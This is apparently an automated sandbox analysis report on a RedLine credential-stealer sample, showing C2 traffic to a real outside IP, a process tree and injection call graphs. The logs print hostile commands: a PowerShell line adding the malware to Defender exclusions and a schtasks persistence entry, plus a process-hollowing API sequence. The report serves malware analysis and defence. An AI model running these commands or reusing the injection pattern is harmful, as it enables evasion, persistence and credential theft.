                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>185.222.58.233</b:string><b:string>14.221.119.206</b:string><b:string>218.65.17.113</b:string><b:string>117.63.234.176</b:string><b:string>110.246.230.68</b:string><b:string>103.40.79.21</b:string><b:string>123.132.1.183</b:string><b:string>171.11.3.221</b:string><b:string>43.159.244.65</b:string><b:string>117.24.105.210</b:string><b:string>40.122.25.223</b:string><b:string>113.103.89.0</b:string><b:string>36.99.136.137</b:string><b:string>139.186.206.86</b:string><b:string>220.191.227.6</b:string><b:string>47.57.237.64</b:string><b:string>94.134.183.13</b:string><b:string>59.42.145.234</b:st [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549718185.222.58.233556153920C:\Users\user\AppData\Roaming\ECcZgk.exe
                      TimestampBytes transferredDirectionData
                      Sep 8, 2024 13:34:26.050968885 CEST222OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.58.233:55615
                      Content-Length: 978563
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Sep 8, 2024 13:34:27.541908026 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:27 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549719185.222.58.233556153920C:\Users\user\AppData\Roaming\ECcZgk.exe
                      TimestampBytes transferredDirectionData
                      Sep 8, 2024 13:34:27.551171064 CEST242OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.58.233:55615
                      Content-Length: 978555
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Sep 8, 2024 13:34:29.045892000 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:28 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:07:33:57
                      Start date:08/09/2024
                      Path:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\l2rMtmFkD6.exe"
                      Imagebase:0x5c0000
                      File size:677'896 bytes
                      MD5 hash:1BAC686FAC8C55F6824923FD43CA0D9E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:07:34:03
                      Start date:08/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"
                      Imagebase:0xb0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:07:34:03
                      Start date:08/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:07:34:03
                      Start date:08/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"
                      Imagebase:0xb0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:07:34:03
                      Start date:08/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:07:34:03
                      Start date:08/09/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"
                      Imagebase:0xcb0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:07:34:03
                      Start date:08/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:07:34:04
                      Start date:08/09/2024
                      Path:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\l2rMtmFkD6.exe"
                      Imagebase:0xca0000
                      File size:677'896 bytes
                      MD5 hash:1BAC686FAC8C55F6824923FD43CA0D9E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:9
                      Start time:07:34:04
                      Start date:08/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:10
                      Start time:07:34:06
                      Start date:08/09/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:11
                      Start time:07:34:06
                      Start date:08/09/2024
                      Path:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      Imagebase:0x370000
                      File size:677'896 bytes
                      MD5 hash:1BAC686FAC8C55F6824923FD43CA0D9E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:12
                      Start time:07:34:13
                      Start date:08/09/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
                      Imagebase:0xcb0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:07:34:13
                      Start date:08/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:14
                      Start time:07:34:13
                      Start date:08/09/2024
                      Path:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\ECcZgk.exe"
                      Imagebase:0xe00000
                      File size:677'896 bytes
                      MD5 hash:1BAC686FAC8C55F6824923FD43CA0D9E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:15
                      Start time:07:34:13
                      Start date:08/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:12%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:1.9%
                        Total number of Nodes:158
                        Total number of Limit Nodes:7
                        execution_graph 24556 cbd608 DuplicateHandle 24557 cbd69e 24556->24557 24568 cb4668 24569 cb467a 24568->24569 24570 cb4686 24569->24570 24572 cb4778 24569->24572 24573 cb479d 24572->24573 24577 cb4878 24573->24577 24581 cb4888 24573->24581 24578 cb4882 24577->24578 24580 cb498c 24578->24580 24585 cb44e0 24578->24585 24583 cb48af 24581->24583 24582 cb498c 24582->24582 24583->24582 24584 cb44e0 CreateActCtxA 24583->24584 24584->24582 24586 cb5918 CreateActCtxA 24585->24586 24588 cb59db 24586->24588 24740 cbb038 24741 cbb047 24740->24741 24744 cbb11f 24740->24744 24749 cbb130 24740->24749 24745 cbb141 24744->24745 24746 cbb15c 24744->24746 24745->24746 24754 cbb3ba 24745->24754 24758 cbb3c8 24745->24758 24746->24741 24750 cbb141 24749->24750 24751 cbb15c 24749->24751 24750->24751 24752 cbb3ba LoadLibraryExW 24750->24752 24753 cbb3c8 LoadLibraryExW 24750->24753 24751->24741 24752->24751 24753->24751 24755 cbb3dc 24754->24755 24757 cbb401 24755->24757 24762 cbab30 24755->24762 24757->24746 24759 cbb3dc 24758->24759 24760 cbab30 LoadLibraryExW 24759->24760 24761 cbb401 24759->24761 24760->24761 24761->24746 24763 cbb5a8 LoadLibraryExW 24762->24763 24765 cbb621 24763->24765 24765->24757 24589 5c4af60 24590 5c4af66 24589->24590 24591 5c4ae74 24589->24591 24590->24591 24594 5c4dd28 24590->24594 24608 5c4dd0a 24590->24608 24595 5c4dd42 24594->24595 24622 5c4e694 24595->24622 24629 5c4e049 24595->24629 24635 5c4e5e8 24595->24635 24641 5c4e15f 24595->24641 24647 5c4eafc 24595->24647 24651 5c4e623 24595->24651 24655 5c4e522 24595->24655 24659 5c4e572 24595->24659 24664 5c4e6d2 24595->24664 24668 5c4e771 24595->24668 24673 5c4ea55 24595->24673 24596 5c4dd4a 24596->24591 24609 5c4dd28 24608->24609 24611 5c4e694 4 API calls 24609->24611 24612 5c4ea55 2 API calls 24609->24612 24613 5c4e771 2 API calls 24609->24613 24614 5c4e6d2 2 API calls 24609->24614 24615 5c4e572 2 API calls 24609->24615 24616 5c4e522 2 API calls 24609->24616 24617 5c4e623 2 API calls 24609->24617 24618 5c4eafc 2 API calls 24609->24618 24619 5c4e15f 2 API calls 24609->24619 24620 5c4e5e8 4 API calls 24609->24620 24621 5c4e049 2 API calls 24609->24621 24610 5c4dd4a 24610->24591 24611->24610 24612->24610 24613->24610 24614->24610 24615->24610 24616->24610 24617->24610 24618->24610 24619->24610 24620->24610 24621->24610 24677 5c4a631 24622->24677 24681 5c4a638 24622->24681 24623 5c4e589 24623->24596 24685 5c4a587 24623->24685 24689 5c4a588 24623->24689 24624 5c4ec05 24630 5c4e08b 24629->24630 24631 5c4e157 24630->24631 24693 5c4aa57 24630->24693 24697 5c4aa58 24630->24697 24631->24596 24701 5c4a708 24635->24701 24705 5c4a710 24635->24705 24636 5c4e60d 24709 5c4a7c8 24636->24709 24713 5c4a7d0 24636->24713 24643 5c4e132 24641->24643 24642 5c4e157 24642->24596 24643->24642 24645 5c4aa57 CreateProcessA 24643->24645 24646 5c4aa58 CreateProcessA 24643->24646 24644 5c4e250 24644->24596 24645->24644 24646->24644 24648 5c4e9cf 24647->24648 24649 5c4a7d0 WriteProcessMemory 24648->24649 24650 5c4a7c8 WriteProcessMemory 24648->24650 24649->24648 24650->24648 24653 5c4a631 Wow64SetThreadContext 24651->24653 24654 5c4a638 Wow64SetThreadContext 24651->24654 24652 5c4e2b5 24653->24652 24654->24652 24657 5c4a7d0 WriteProcessMemory 24655->24657 24658 5c4a7c8 WriteProcessMemory 24655->24658 24656 5c4e553 24657->24656 24658->24656 24660 5c4e578 24659->24660 24662 5c4a587 ResumeThread 24660->24662 24663 5c4a588 ResumeThread 24660->24663 24661 5c4ec05 24662->24661 24663->24661 24717 5c4a8c0 24664->24717 24721 5c4a8b8 24664->24721 24665 5c4e351 24669 5c4e77e 24668->24669 24671 5c4a587 ResumeThread 24669->24671 24672 5c4a588 ResumeThread 24669->24672 24670 5c4ec05 24671->24670 24672->24670 24675 5c4a7d0 WriteProcessMemory 24673->24675 24676 5c4a7c8 WriteProcessMemory 24673->24676 24674 5c4ea83 24675->24674 24676->24674 24678 5c4a638 Wow64SetThreadContext 24677->24678 24680 5c4a6c5 24678->24680 24680->24623 24682 5c4a67d Wow64SetThreadContext 24681->24682 24684 5c4a6c5 24682->24684 24684->24623 24686 5c4a5c8 ResumeThread 24685->24686 24688 5c4a5f9 24686->24688 24688->24624 24690 5c4a5c8 ResumeThread 24689->24690 24692 5c4a5f9 24690->24692 24692->24624 24694 5c4aae1 CreateProcessA 24693->24694 24696 5c4aca3 24694->24696 24698 5c4aae1 CreateProcessA 24697->24698 24700 5c4aca3 24698->24700 24702 5c4a70d VirtualAllocEx 24701->24702 24704 5c4a78d 24702->24704 24704->24636 24706 5c4a750 VirtualAllocEx 24705->24706 24708 5c4a78d 24706->24708 24708->24636 24710 5c4a7d0 WriteProcessMemory 24709->24710 24712 5c4a86f 24710->24712 24712->24636 24714 5c4a818 WriteProcessMemory 24713->24714 24716 5c4a86f 24714->24716 24716->24636 24718 5c4a90b ReadProcessMemory 24717->24718 24720 5c4a94f 24718->24720 24720->24665 24722 5c4a8c0 ReadProcessMemory 24721->24722 24724 5c4a94f 24722->24724 24724->24665 24725 5c4ef60 24726 5c4f0eb 24725->24726 24728 5c4ef86 24725->24728 24728->24726 24729 5c4b958 24728->24729 24730 5c4f1e0 PostMessageW 24729->24730 24731 5c4f24c 24730->24731 24731->24728 24558 cbd3c0 24559 cbd406 GetCurrentProcess 24558->24559 24561 cbd458 GetCurrentThread 24559->24561 24562 cbd451 24559->24562 24563 cbd48e 24561->24563 24564 cbd495 GetCurrentProcess 24561->24564 24562->24561 24563->24564 24567 cbd4cb 24564->24567 24565 cbd4f3 GetCurrentThreadId 24566 cbd524 24565->24566 24567->24565 24732 cbb320 24733 cbb368 GetModuleHandleW 24732->24733 24734 cbb362 24732->24734 24735 cbb395 24733->24735 24734->24733 24736 5c4f6a8 24737 5c4f6c9 24736->24737 24739 5c4f6dc 24736->24739 24738 5c4b958 PostMessageW 24737->24738 24738->24739

                        Executed Functions

                        Function 05C4E049 Relevance: .2, Instructions: 173COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9643ed8db4bda443af6461536507a63c23de086730f35f7c6e6798ba944d38a
                        • Instruction ID: c8c98af3168a9e3706eee677c9de7f20e3c2abbfb657ce969df20293d7cb59c7
                        • Opcode Fuzzy Hash: b9643ed8db4bda443af6461536507a63c23de086730f35f7c6e6798ba944d38a
                        • Instruction Fuzzy Hash: 07712871D44628CBEB24CF66C844BEDFBBABF89300F10D5AAD409A7251EB705A85CF41
                        Function 05C45249 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3598881078f79924cb021279fa379010719aa47c60cef77d6bcb8f19dc76e1e0
                        • Instruction ID: 1c5af1b30a2cd48c28b1888caa2968438109228abda854573c17716ad2b23900
                        • Opcode Fuzzy Hash: 3598881078f79924cb021279fa379010719aa47c60cef77d6bcb8f19dc76e1e0
                        • Instruction Fuzzy Hash: 1421BFB1D056189BEB18CFABC94979EFEF7BFC9300F14C16AD408A6254DB7509468F90
                        Function 00CBD3C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 297 cbd3c0-cbd44f GetCurrentProcess 301 cbd458-cbd48c GetCurrentThread 297->301 302 cbd451-cbd457 297->302 303 cbd48e-cbd494 301->303 304 cbd495-cbd4c9 GetCurrentProcess 301->304 302->301 303->304 306 cbd4cb-cbd4d1 304->306 307 cbd4d2-cbd4ed call cbd590 304->307 306->307 310 cbd4f3-cbd522 GetCurrentThreadId 307->310 311 cbd52b-cbd58d 310->311 312 cbd524-cbd52a 310->312 312->311
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 00CBD43E
                        • GetCurrentThread.KERNEL32 ref: 00CBD47B
                        • GetCurrentProcess.KERNEL32 ref: 00CBD4B8
                        • GetCurrentThreadId.KERNEL32 ref: 00CBD511
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 7e119ce8f8c8fdf588ccc753a2cdb481f4bb8d0bcee895a7ee153139b57d9357
                        • Instruction ID: 9d0c36044265cd4157cf6a180cf4e4b9a4ec9403a3efc6aa218170a7b642815c
                        • Opcode Fuzzy Hash: 7e119ce8f8c8fdf588ccc753a2cdb481f4bb8d0bcee895a7ee153139b57d9357
                        • Instruction Fuzzy Hash: 8F5134B0D003498FDB14DFA9D948BAEBBF1FB88314F248459E419A7390D774A984CF66
                        Function 05C4AA58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 488 5c4aa58-5c4aaed 490 5c4ab26-5c4ab46 488->490 491 5c4aaef-5c4aaf9 488->491 498 5c4ab7f-5c4abae 490->498 499 5c4ab48-5c4ab52 490->499 491->490 492 5c4aafb-5c4aafd 491->492 493 5c4ab20-5c4ab23 492->493 494 5c4aaff-5c4ab09 492->494 493->490 496 5c4ab0d-5c4ab1c 494->496 497 5c4ab0b 494->497 496->496 500 5c4ab1e 496->500 497->496 507 5c4abe7-5c4aca1 CreateProcessA 498->507 508 5c4abb0-5c4abba 498->508 499->498 501 5c4ab54-5c4ab56 499->501 500->493 503 5c4ab58-5c4ab62 501->503 504 5c4ab79-5c4ab7c 501->504 505 5c4ab64 503->505 506 5c4ab66-5c4ab75 503->506 504->498 505->506 506->506 509 5c4ab77 506->509 519 5c4aca3-5c4aca9 507->519 520 5c4acaa-5c4ad30 507->520 508->507 510 5c4abbc-5c4abbe 508->510 509->504 512 5c4abc0-5c4abca 510->512 513 5c4abe1-5c4abe4 510->513 514 5c4abcc 512->514 515 5c4abce-5c4abdd 512->515 513->507 514->515 515->515 517 5c4abdf 515->517 517->513 519->520 530 5c4ad40-5c4ad44 520->530 531 5c4ad32-5c4ad36 520->531 533 5c4ad54-5c4ad58 530->533 534 5c4ad46-5c4ad4a 530->534 531->530 532 5c4ad38 531->532 532->530 536 5c4ad68-5c4ad6c 533->536 537 5c4ad5a-5c4ad5e 533->537 534->533 535 5c4ad4c 534->535 535->533 538 5c4ad7e-5c4ad85 536->538 539 5c4ad6e-5c4ad74 536->539 537->536 540 5c4ad60 537->540 541 5c4ad87-5c4ad96 538->541 542 5c4ad9c 538->542 539->538 540->536 541->542 544 5c4ad9d 542->544 544->544
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C4AC8E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: c4e7fe60db90446656d2b0590d9318ee2203ca6957f6a1f148e16575352c5abd
                        • Instruction ID: 428563a5f403ac20198c9784b795cc54722a1a0dc86cba0a7d4cb2eee9caa8d6
                        • Opcode Fuzzy Hash: c4e7fe60db90446656d2b0590d9318ee2203ca6957f6a1f148e16575352c5abd
                        • Instruction Fuzzy Hash: 6A913C71D006199FDB24CFA8CC45BEDBBB3BF48314F148569D809A7290DB749A85CF92
                        Function 05C4AA57 Relevance: 1.7, APIs: 1, Instructions: 241processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 545 5c4aa57-5c4aaed 547 5c4ab26-5c4ab46 545->547 548 5c4aaef-5c4aaf9 545->548 555 5c4ab7f-5c4abae 547->555 556 5c4ab48-5c4ab52 547->556 548->547 549 5c4aafb-5c4aafd 548->549 550 5c4ab20-5c4ab23 549->550 551 5c4aaff-5c4ab09 549->551 550->547 553 5c4ab0d-5c4ab1c 551->553 554 5c4ab0b 551->554 553->553 557 5c4ab1e 553->557 554->553 564 5c4abe7-5c4aca1 CreateProcessA 555->564 565 5c4abb0-5c4abba 555->565 556->555 558 5c4ab54-5c4ab56 556->558 557->550 560 5c4ab58-5c4ab62 558->560 561 5c4ab79-5c4ab7c 558->561 562 5c4ab64 560->562 563 5c4ab66-5c4ab75 560->563 561->555 562->563 563->563 566 5c4ab77 563->566 576 5c4aca3-5c4aca9 564->576 577 5c4acaa-5c4ad30 564->577 565->564 567 5c4abbc-5c4abbe 565->567 566->561 569 5c4abc0-5c4abca 567->569 570 5c4abe1-5c4abe4 567->570 571 5c4abcc 569->571 572 5c4abce-5c4abdd 569->572 570->564 571->572 572->572 574 5c4abdf 572->574 574->570 576->577 587 5c4ad40-5c4ad44 577->587 588 5c4ad32-5c4ad36 577->588 590 5c4ad54-5c4ad58 587->590 591 5c4ad46-5c4ad4a 587->591 588->587 589 5c4ad38 588->589 589->587 593 5c4ad68-5c4ad6c 590->593 594 5c4ad5a-5c4ad5e 590->594 591->590 592 5c4ad4c 591->592 592->590 595 5c4ad7e-5c4ad85 593->595 596 5c4ad6e-5c4ad74 593->596 594->593 597 5c4ad60 594->597 598 5c4ad87-5c4ad96 595->598 599 5c4ad9c 595->599 596->595 597->593 598->599 601 5c4ad9d 599->601 601->601
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C4AC8E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
